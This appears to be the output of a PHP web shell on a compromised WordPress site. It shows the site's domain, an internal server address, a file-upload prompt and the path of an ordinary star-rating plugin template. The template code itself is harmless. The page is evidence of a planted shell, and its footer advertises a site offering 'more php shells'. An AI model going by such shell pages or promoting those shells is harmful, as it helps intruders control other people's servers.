Domain: antoinekatan.com
Server Adress: 10.127.20.23

privdayz.com

/home/xdxuekl/www/wp-content/plugins/quart-core/reviews/templates/admin/
Dosya Yükle :
Current File : /home/xdxuekl/www/wp-content/plugins/quart-core/reviews/templates/admin/stars-field.php

<p>
	<label for="rating">
		<?php echo esc_html( $label ); ?>
	</label>
	<span class="commentratingbox">
        <?php for ( $i = 1; $i <= QUART_CORE_REVIEWS_MAX_RATING; $i ++ ) { ?>
	        <span class="commentrating">
                <input type="radio" name="<?php echo esc_attr( $key ); ?>" class="rating" value="<?php echo esc_attr( $i ); ?>" <?php echo $rating == $i ? 'checked="checked"' : ''; ?> />
            </span>
        <?php } ?>
    </span>
</p>

coded by Privdayz.com - Visit https://privdayz.com/ for more php shells.